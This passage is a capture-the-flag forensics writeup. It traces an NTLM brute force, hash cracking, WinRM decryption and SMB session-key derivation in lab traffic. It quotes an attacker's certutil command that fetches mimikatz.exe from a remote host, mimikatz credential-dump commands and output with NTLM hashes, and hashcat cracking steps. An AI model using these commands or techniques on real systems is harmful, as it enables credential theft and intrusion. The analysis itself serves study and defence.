Software System Security Competition: pth_attack retrospective

Preface

Nanjing University's hospitality was beyond reproach: a beautiful campus, delicious chicken legs at lunch, and biscuits, bread and other snacks on top; I ate very well. The competition itself, though, was fairly absurd. At lunchtime I naively assumed the organizers had taken the site down on purpose so we could rest and eat in peace. Those who know, know...

pth_attack

Challenge description

Lateral-movement attack traffic was captured on the company intranet. Analyze what the attacker did. (Submit only the content inside dart{}.)

Solution

Approach during the competition

The challenge provides two archives; the first contains WinRM and SMB traffic.

A large number of SMB authentication requests can be seen, so we can infer that the administrator password is being brute-forced.

Go straight to the packet where the brute force succeeded.

From packet 3294 onward SMB switches to encrypted transport, which means authentication succeeded there. Extract the NTLMv2 hash.
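
The detection-side counterpart of the observation above, added here as an example (it is not part of the original writeup): given one record per SMB2 Session Setup response with frame number, source, destination, account and NTSTATUS, count STATUS_LOGON_FAILURE responses per (source, target, account) and report a STATUS_SUCCESS that follows a run of them. The CSV layout is my own (not a tshark output format), and every record in it, including the frame numbers and the 10.10.10.80 to 10.10.10.201 pairing, is constructed for the example rather than extracted from the challenge capture.

```python
"""Flag an SMB brute force that ends in a success.

Added example for this writeup (not the author's code).  Input: one record per
SMB2 Session Setup response with frame number, source, destination, account and
NTSTATUS.  The CSV layout and all records below are constructed for the example.
"""
import csv
import io
from collections import defaultdict

STATUS_SUCCESS = 0x00000000
STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016   # challenge round-trip, not a verdict
STATUS_LOGON_FAILURE = 0xC000006D

# Constructed records: six failed attempts for administrator, then a success;
# a second account with one failure (a typo) that must not be flagged.
SAMPLE_CSV = """frame,src,dst,account,ntstatus
3270,10.10.10.80,10.10.10.201,administrator,0xc0000016
3271,10.10.10.80,10.10.10.201,administrator,0xc000006d
3274,10.10.10.80,10.10.10.201,administrator,0xc0000016
3275,10.10.10.80,10.10.10.201,administrator,0xc000006d
3278,10.10.10.80,10.10.10.201,administrator,0xc0000016
3279,10.10.10.80,10.10.10.201,administrator,0xc000006d
3282,10.10.10.80,10.10.10.201,administrator,0xc0000016
3283,10.10.10.80,10.10.10.201,administrator,0xc000006d
3286,10.10.10.80,10.10.10.201,administrator,0xc0000016
3287,10.10.10.80,10.10.10.201,administrator,0xc000006d
3290,10.10.10.80,10.10.10.201,administrator,0xc0000016
3291,10.10.10.80,10.10.10.201,administrator,0xc000006d
3293,10.10.10.80,10.10.10.201,administrator,0xc0000016
3294,10.10.10.80,10.10.10.201,administrator,0x00000000
3300,10.10.10.50,10.10.10.201,de1ay,0xc000006d
3302,10.10.10.50,10.10.10.201,de1ay,0x00000000
"""


def parse_records(text):
    """Read the constructed CSV rows into dicts with integer frame and NTSTATUS."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "frame": int(r["frame"]),
            "src": r["src"],
            "dst": r["dst"],
            "account": r["account"].lower(),   # Administrator and administrator are one account
            "status": int(r["ntstatus"], 16),
        })
    return rows


def find_bruteforce_then_success(records, min_failures=5):
    """Per (src, dst, account): count STATUS_LOGON_FAILURE responses since the last
    success and report a STATUS_SUCCESS that follows at least min_failures of them."""
    failures = defaultdict(int)
    first_failure = {}
    findings = []
    for r in sorted(records, key=lambda x: x["frame"]):
        key = (r["src"], r["dst"], r["account"])
        if r["status"] == STATUS_LOGON_FAILURE:
            failures[key] += 1
            first_failure.setdefault(key, r["frame"])
        elif r["status"] == STATUS_SUCCESS:
            if failures[key] >= min_failures:
                findings.append({
                    "src": key[0], "dst": key[1], "account": key[2],
                    "failures": failures[key],
                    "first_failure_frame": first_failure[key],
                    "success_frame": r["frame"],
                })
            failures[key] = 0            # a success ends the run either way
            first_failure.pop(key, None)
        # STATUS_MORE_PROCESSING_REQUIRED and other statuses do not change the count
    return findings


def run_sample():
    return find_bruteforce_then_success(parse_records(SAMPLE_CSV))


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['src']} -> {f['dst']} as {f['account']}: {f['failures']} failures "
              f"from frame {f['first_failure_frame']}, success at frame {f['success_frame']}")
```

The threshold is a knob; a spray that rotates accounts from one source would need the key to be (src, dst) rather than (src, dst, account). In the challenge capture the same signal is what the eye picks up when filtering on Session Setup responses: a run of failures ending in the success at which the encrypted SMB traffic begins.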

This tool extracts every NTLMv2 hash in the traffic: mlgualtieri/NTLMRawUnHide

It can also be done by hand.

The NTLMv2 format is: `username::domain:challenge:HMAC-MD5:blob`

challenge is the NTLM Server Challenge; domain is taken from the packet contents (an IP or machine name).

HMAC-MD5 corresponds to NTProofStr in the packet.

blob corresponds to the remainder of the Response after NTProofStr is removed.

The detailed extraction process is described in this article:

Password hashes on Windows: an introduction to NTLM hash and Net-NTLM hash - husterlong - 博客园

administrator:::9d92b46171a87637:4103e8d84572fa74f220ecc20be704c1:010100000000000048bac1a9bc72dc01447637675159784300000000010004004400430002000a004400450031004100590003001800440043002e00640065003100610079002e0063006f006d0004001200640065003100610079002e0063006f006d0005001200640065003100610079002e0063006f006d000700080048bac1a9bc72dc0109000e0063006900660073002f00440043000000000000000000
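
To make the manual extraction concrete, here is an added example (my code, neither the author's nor NTLMRawUnHide's) that splits an NtChallengeResponse into NTProofStr and blob, assembles the hashcat -m 5600 line in the format above, parses such a line back (including the empty-domain case seen in the line above), and checks whether a given NT hash reproduces the captured NTProofStr following MS-NLMP: ResponseKeyNT = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)) and NTProofStr = HMAC-MD5(ResponseKeyNT, ServerChallenge || blob). The account name, NT hash, challenges, timestamp and AV pairs in the sample are constructed; nothing in it comes from the challenge capture.

```python
"""Assemble and check an NTLMv2 (hashcat -m 5600) line from captured fields.

Added example for this writeup, not the post's code.  All sample values
(account, NT hash, challenges, timestamp, AV pairs) are constructed; the only
thing taken from the post is the line format user::domain:challenge:NTProofStr:blob.
"""
import hashlib
import hmac
from dataclasses import dataclass

NTPROOF_LEN = 16  # NTProofStr is one HMAC-MD5 output


@dataclass
class NtlmV2Parts:
    user: str
    domain: str
    server_challenge: bytes  # 8-byte ServerChallenge from the CHALLENGE_MESSAGE
    nt_proof: bytes          # 16-byte NTProofStr
    blob: bytes              # rest of NtChallengeResponse (MS-NLMP 'temp')


def split_ntlmv2_response(nt_challenge_response: bytes):
    """NtChallengeResponse = NTProofStr || blob; the blob opens with RespType 0x01, HiRespType 0x01."""
    if len(nt_challenge_response) <= NTPROOF_LEN:
        raise ValueError("NTLMv2 response too short")
    nt_proof, blob = nt_challenge_response[:NTPROOF_LEN], nt_challenge_response[NTPROOF_LEN:]
    if blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 blob (expected 0x01 0x01 header)")
    return nt_proof, blob


def hashcat_5600_line(p: NtlmV2Parts) -> str:
    return f"{p.user}::{p.domain}:{p.server_challenge.hex()}:{p.nt_proof.hex()}:{p.blob.hex()}"


def parse_hashcat_5600_line(line: str) -> NtlmV2Parts:
    """Inverse of hashcat_5600_line; the domain field may be empty (user:::challenge:...)."""
    user, _empty, domain, challenge, proof, blob = line.strip().split(":")
    return NtlmV2Parts(user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob))


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """ResponseKeyNT (MS-NLMP 3.3.2): HMAC-MD5 keyed by the NT hash over UTF-16LE(UPPER(user) + domain)."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def compute_nt_proof(nt_hash, user, domain, server_challenge, blob) -> bytes:
    """NTProofStr = HMAC-MD5(ResponseKeyNT, ServerChallenge || blob)."""
    return hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()


def nt_hash_matches(p: NtlmV2Parts, nt_hash: bytes) -> bool:
    """True when this NT hash reproduces the captured NTProofStr, i.e. it is the credential that authenticated."""
    expected = compute_nt_proof(nt_hash, p.user, p.domain, p.server_challenge, p.blob)
    return hmac.compare_digest(expected, p.nt_proof)


def av_pair(av_id: int, value: str) -> bytes:
    data = value.encode("utf-16-le")
    return av_id.to_bytes(2, "little") + len(data).to_bytes(2, "little") + data


def build_blob(timestamp: bytes, client_challenge: bytes, av_pairs: bytes) -> bytes:
    """MS-NLMP 'temp': 01 01 0000 00000000 timestamp clientchallenge 00000000 avpairs 00000000."""
    return (b"\x01\x01" + b"\x00" * 2 + b"\x00" * 4 + timestamp + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)


# Constructed sample: no real account, hash or capture behind these values
SAMPLE_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_USER, SAMPLE_DOMAIN = "alice", "LAB"
SAMPLE_SERVER_CHALLENGE = bytes.fromhex("0102030405060708")
SAMPLE_BLOB = build_blob(
    timestamp=bytes.fromhex("00a0b1c2d3e4dc01"),
    client_challenge=bytes.fromhex("a1b2c3d4e5f60718"),
    av_pairs=av_pair(0x0002, "LAB") + av_pair(0x0000, ""),   # MsvAvNbDomainName, MsvAvEOL
)


def sample_parts() -> NtlmV2Parts:
    """What an analyst would pull out of a capture of the constructed exchange."""
    proof = compute_nt_proof(SAMPLE_NT_HASH, SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_SERVER_CHALLENGE, SAMPLE_BLOB)
    nt_proof, blob = split_ntlmv2_response(proof + SAMPLE_BLOB)
    return NtlmV2Parts(SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_SERVER_CHALLENGE, nt_proof, blob)


if __name__ == "__main__":
    parts = sample_parts()
    print(hashcat_5600_line(parts))
    print("NT hash reproduces NTProofStr:", nt_hash_matches(parts, SAMPLE_NT_HASH))
```

nt_hash_matches is the check an analyst wants once a hash turns up in a memory dump later in the investigation: it confirms that the hash really is the credential behind a given authentication in the capture, without guessing a password. Note that MS-NLMP uppercases only the user name, not the domain; the session-key script later in this writeup uppercases both, which makes no difference there because its domain is empty.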

Then brute-force it with rockyou. Unfortunately it is a strong password and did not crack:

hashcat -m 5600 ad5_hash.txt rockyou.txt

Likewise, the later admin hash in the SMB traffic could not be cracked.

So I went back to the HTTP stream and extracted the NTLMv2 hash from there:

administrator::pc:8317e378f3d84c16:eac0fa03a412b0a3d029dcea2a386231:01010000000000002abaa933bc72dc01592e32c3bb93f0fe0000000002000a0044004500310041005900010004005000430004001200640065003100610079002e0063006f006d0003001800500043002e00640065003100610079002e0063006f006d0005001200640065003100610079002e0063006f006d00070008002abaa933bc72dc010600040002000000080030003000000000000000000000000030000026544cc05c735b21ae876ab6adeaf35030fb649315896d1d685326c99ddb5f6b0a001000000000000000000000000000000000000900220048005400540050002f00310030002e00310030002e00310030002e00320030003100000000000000000000000000

hashcat -m 5600 ad4_hash.txt rockyou.txt --show

The recovered password is pass@word1.

With the password, the WinRM traffic can be decrypted; this uses h4sh5/decrypt-winrm:

python winrm_decrypt.py -p pass@word1 1-pth.pcapng

The decrypted output contains PowerShell commands; a short script extracts and base64-decodes them:

import re
import base64
import binascii


# Decrypted WinRM output written by winrm_decrypt.py
with open("pass@word1.txt", "r", encoding="utf-8") as f:
    text = f.read()

# Standalone base64 runs (at least 8 characters, optional padding) that are not glued to other base64 characters
pattern = r'(?<![A-Za-z0-9+/=])(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?(?![A-Za-z0-9+/=])'
matches = re.findall(pattern, text)

for s in matches:
    try:
        payload = base64.b64decode(s).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        continue  # not valid base64 after all, or not text
    # Keep only payloads that start with a letter or digit, which drops binary noise
    if payload and payload[0].isalnum():
        print(payload, end="\n-------------------\n")

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Users\Administrator.PC>pc\administrator

C:\Users\Administrator.PC>
Windows IP 配置

   主机名  . . . . . . . . . . . . . : PC
   主 DNS 后缀 . . . . . . . . . . . : de1ay.com
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
   DNS 后缀搜索列表  . . . . . . . . : de1ay.com

以太网适配器 本地连接 5:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #5
   物理地址. . . . . . . . . . . . . : 52-54-00-41-4A-45
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::d8db:a779:15b7:3086%20(首选) 
   IPv4 地址 . . . . . . . . . . . . : 10.10.10.201(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 458380288
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-07-6C-31-00-0C-29-9E-7B-70
   DNS 服务器  . . . . . . . . . . . : 10.10.10.10
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

以太网适配器 本地连接 4:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #4
   物理地址. . . . . . . . . . . . . : 52-54-00-41-4A-44
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::9176:1eee:fe21:d554%19(首选) 
   IPv4 地址 . . . . . . . . . . . . : 192.168.242.63(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.242.168
   DHCPv6 IAID . . . . . . . . . . . : 408048640
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-07-6C-31-00-0C-29-9E-7B-70
   DNS 服务器  . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

以太网适配器 本地连接 3:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #3
   物理地址. . . . . . . . . . . . . : 52-54-00-41-4A-46
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
   本地站点的 IPv6 地址. . . . . . . : fec0::9131:a939:1e87:ccd0%1(首选) 
   本地链接 IPv6 地址. . . . . . . . : fe80::9131:a939:1e87:ccd0%18(首选) 
   IPv4 地址 . . . . . . . . . . . . : 10.0.2.15(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   获得租约的时间  . . . . . . . . . : 2025年12月22日 4:13:51
   租约过期的时间  . . . . . . . . . : 2025年12月23日 4:14:46
   默认网关. . . . . . . . . . . . . : fe80::2%18
   DHCP 服务器 . . . . . . . . . . . : 10.0.2.2
   DNS 服务器  . . . . . . . . . . . : 10.0.2.3
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

隧道适配器 isatap.{B0504C3B-D107-4C24-B009-551D39B58C97}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{C6A0F3CF-2827-44DC-B60B-D8332C4938AA}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{68DFDB8C-CD53-4196-85E5-6E8EA5138D07}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

C:\Users\Administrator.PC>****  联机  ****
CertUtil: -URLCache 命令成功完成。

C:\Users\Administrator.PC>

At this point during the competition I thought the challenge was broken, since there was nothing useful in the WinRM traffic.

Post-competition retrospective

Only after reading a more experienced player's writeup did I see the problem.

The WinRM decryption script raises an error and stops as soon as it hits a malformed frame, so everything after that frame was never decrypted. I had an AI patch it.

Re-extracting and decrypting:

whoami

-------------------
pc\administrator
-------------------
C:\Users\Administrator.PC>
-------------------
ipconfig /all

-------------------
C:\Users\Administrator.PC>
-------------------
certutil -urlcache -f http://10.10.10.80:8000/mimikatz.exe mimikatz.exe

-------------------
C:\Users\Administrator.PC>
-------------------
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" > 1.log

-------------------
C:\Users\Administrator.PC>
-------------------
a Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords full

Authentication Id : 0 ; 918546 (00000000:000e0412)
Session           : RemoteInteractive from 2
User Name         : administrator
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2025/12/22 4:43:03
SID               : S-1-5-21-2756371121-2868759905-3853650604-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DE1AY
         * LM       : 4885d2c71db12bab1eba5e9d51b4aa9c
         * NTLM     : 3d83254b53697355ef7498b535e7ab29
         * SHA1     : a08ec5f6abc5d3bf6497d3aa3370f6ff37548d0b
        tspkg :
         * Username : Administrator
         * Domain   : DE1AY
         * Password : 
        wdigest :
         * Username : Administrator
         * Domain   : DE1AY
         * Password : 
        kerberos :
         * Username : administrator
         * Domain   : DE1AY.COM
         * Password : 
        ssp :
        credman :

Authentication Id : 0 ; 712045 (00000000:000add6d)
Session           : NetworkCleartext from 0
User Name         : de1ay
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2025/12/22 4:36:31
SID               : S-1-5-21-2756371121-2868759905-3853650604-1001
        msv :
         [00000003] Primary
         * Username : de1ay
         * Domain   : DE1AY
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : de1ay
         * Domain   : DE1AY
         * Password : 
        wdigest :
         * Username : de1ay
         * Domain   : DE1AY
         * Password : 
        kerberos :
         * Username : de1ay
         * Domain   : DE1AY.COM
         * Password : 
        ssp :
        credman :

Authentication Id : 0 ; 709503 (00000000:000ad37f)
Session           : Service from 0
User Name         : sshd_3212
Domain            : VIRTUAL USERS
Logon Server      : (null)
Logon Time        : 2025/12/22 4:36:30
SID               : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-3212
        msv :
         [00000003] Primary
         * Username : PC$
         * Domain   : DE1AY
         * NTLM     : 656ea538d9cf1c85a57bbac5a5020ffd
         * SHA1     : a9cf2cc0fafdb001bd121d53c665340ed208ffc2
        tspkg :
         * Username : PC$
         * Domain   : DE1AY
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        wdigest :
         * Username : PC$
         * Domain   : DE1AY
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        kerberos :
         * Username : PC$
         * Domain   : de1ay.com
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        ssp :
        credman :

Authentication Id : 0 ; 623891 (00000000:00098513)
Session           : NetworkCleartext from 0
User Name         : de1ay
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2025/12/22 4:28:24
SID               : S-1-5-21-2756371121-2868759905-3853650604-1001
        msv :
         [00000003] Primary
         * Username : de1ay
         * Domain   : DE1AY
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : de1ay
         * Domain   : DE1AY
         * Password : 
        wdigest :
         * Username : de1ay
         * Domain   : DE1AY
         * Password : 
        kerberos :
         * Username : de1ay
         * Domain   : DE1AY.COM
         * Password : 
        ssp :
        credman :

Authentication Id : 0 ; 621283 (00000000:00097ae3)
Session           : Service from 0
User Name         : sshd_3568
Domain            : VIRTUAL USERS
Logon Server      : (null)
Logon Time        : 2025/12/22 4:28:15
SID               : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-3568
        msv :
         [0000
-------------------
0003] Primary
         * Username : PC$
         * Domain   : DE1AY
         * NTLM     : 656ea538d9cf1c85a57bbac5a5020ffd
         * SHA1     : a9cf2cc0fafdb001bd121d53c665340ed208ffc2
        tspkg :
         * Username : PC$
         * Domain   : DE1AY
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        wdigest :
         * Username : PC$
         * Domain   : DE1AY
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        kerberos :
         * Username : PC$
         * Domain   : de1ay.com
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        ssp :
        credman :

Authentication Id : 0 ; 475572 (00000000:000741b4)
Session           : CachedInteractive from 1
User Name         : de1ay
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2025/12/22 4:21:19
SID               : S-1-5-21-2756371121-2868759905-3853650604-1001
        msv :
         [00000003] Primary
         * Username : de1ay
         * Domain   : DE1AY
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : de1ay
         * Domain   : DE1AY
         * Password : 
        wdigest :
         * Username : de1ay
         * Domain   : DE1AY
         * Password : 
        kerberos :
         * Username : de1ay
         * Domain   : DE1AY.COM
         * Password : 
        ssp :
        credman :

Authentication Id : 0 ; 449071 (00000000:0006da2f)
Session           : CachedInteractive from 1
User Name         : de1ay
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2025/12/22 4:20:34
SID               : S-1-5-21-2756371121-2868759905-3853650604-1001
        msv :
         [00000003] Primary
         * Username : de1ay
         * Domain   : DE1AY
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : de1ay
         * Domain   : DE1AY
         * Password : 
        wdigest :
         * Username : de1ay
         * Domain   : DE1AY
         * Password : 
        kerberos :
         * Username : de1ay
         * Domain   : DE1AY.COM
         * Password : 
        ssp :
        credman :

Authentication Id : 0 ; 312952 (00000000:0004c678)
Session           : Interactive from 1
User Name         : mssql
Domain            : DE1AY
Logon Server      : DC
Logon Time        : 2025/12/22 4:18:16
SID               : S-1-5-21-2756371121-2868759905-3853650604-2103
        msv :
         [00000003] Primary
         * Username : mssql
         * Domain   : DE1AY
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : mssql
         * Domain   : DE1AY
         * Password : 
        wdigest :
         * Username : mssql
         * Domain   : DE1AY
         * Password : 
        kerberos :
         * Username : mssql
         * Domain   : DE1AY.COM
         * Password : 
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/12/22 4:13:20
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : PC$
Domain            : DE1AY
Logon Server      : (null)
Logon Time        : 2025/12/22 4:13:18
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : PC$
         * Domain   : DE1AY
         * NTLM     : 656ea538d9cf1c85a57bbac5a5020ffd
         * SHA1     : a9cf2cc0fafdb001bd121d53c665340ed208ffc2
        tspkg :
        wdigest :
         * Username : PC$
         * Domain   : DE1AY
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        kerberos :
         * Username : pc$
         * Domain   : 
-------------------
DE1AY.COM
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        ssp :
        credman :

Authentication Id : 0 ; 28405 (00000000:00006ef5)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/12/22 4:13:02
SID               : 
        msv :
         [00000003] Primary
         * Username : PC$
         * Domain   : DE1AY
         * NTLM     : 656ea538d9cf1c85a57bbac5a5020ffd
         * SHA1     : a9cf2cc0fafdb001bd121d53c665340ed208ffc2
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : PC$
Domain            : DE1AY
Logon Server      : (null)
Logon Time        : 2025/12/22 4:13:01
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : PC$
         * Domain   : DE1AY
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        kerberos :
         * Username : pc$
         * Domain   : DE1AY.COM
         * Password : <bR3tZ!fxJng-+pl6IBwqAmR<w0;<Rqq,oS6[tvWN00sa^?tz`a_v:t4b);6yX*a!aUDS#+) % n*,'4:y%:ak'v1w.mpd/^.g&^zvNB;<FhX+-,pxduthU=
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!

C:\Users\Administrator.PC>
-------------------

The attacker dropped mimikatz on the host, dumped credentials, and obtained the administrator's NTLM hash:

         [00000003] Primary
         * Username : Administrator
         * Domain   : DE1AY
         * LM       : 4885d2c71db12bab1eba5e9d51b4aa9c
         * NTLM     : 3d83254b53697355ef7498b535e7ab29
         * SHA1     : a08ec5f6abc5d3bf6497d3aa3370f6ff37548d0b

With the NTLM hash, the session key can be derived and used to decrypt the SMB3 traffic:

from Crypto.Cipher import ARC4
from Crypto.Hash import MD4, MD5, HMAC

# If the cleartext password were known, the NT hash would be MD4 over its UTF-16LE encoding:
# password = 'babygirl233'
# passwordHash = MD4.new(password.encode('utf-16-le')).hexdigest()
passwordHash = '3d83254b53697355ef7498b535e7ab29'   # administrator NT hash dumped by mimikatz
username = 'administrator'
domain = ''
ntProofStr = '4103e8d84572fa74f220ecc20be704c1'     # NTProofStr from the NTLMv2 response
serverChallenge = '9d92b46171a87637'                 # not used by the key-exchange computation below
sessionKey = '7433d4ac87cdff2d38b2e8a5840b919d'     # encrypted session key from the AUTHENTICATE message
sessionId = "0000480000000055"

# Wireshark shows the session id in little-endian byte order, so reverse it for the decryption preference
def reverse_hex_bytes(hex_string):
    return ''.join([hex_string[i:i+2] for i in range(0, len(hex_string), 2)][::-1])

sessionId = reverse_hex_bytes(sessionId)
print('Reversed Session ID is: {}'.format(sessionId))
# ResponseKeyNT = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
responseKey = HMAC.new(bytes.fromhex(passwordHash), (username.upper()+domain.upper()).encode('utf-16-le'), MD5).digest()
# KeyExchangeKey = HMAC-MD5(ResponseKeyNT, NTProofStr)
keyExchangeKey = HMAC.new(responseKey, bytes.fromhex(ntProofStr), MD5).digest()
# The session key travels RC4-encrypted under the KeyExchangeKey
decryptedSessionKey = ARC4.new(keyExchangeKey).decrypt(bytes.fromhex(sessionKey))
print('Decrypted SMB Session Key is: {}'.format(decryptedSessionKey.hex()))

output:
Reversed Session ID is: 5500000000480000
Decrypted SMB Session Key is: 3252507a61756f507132585748475953

Packet 3347 shows a command being executed:

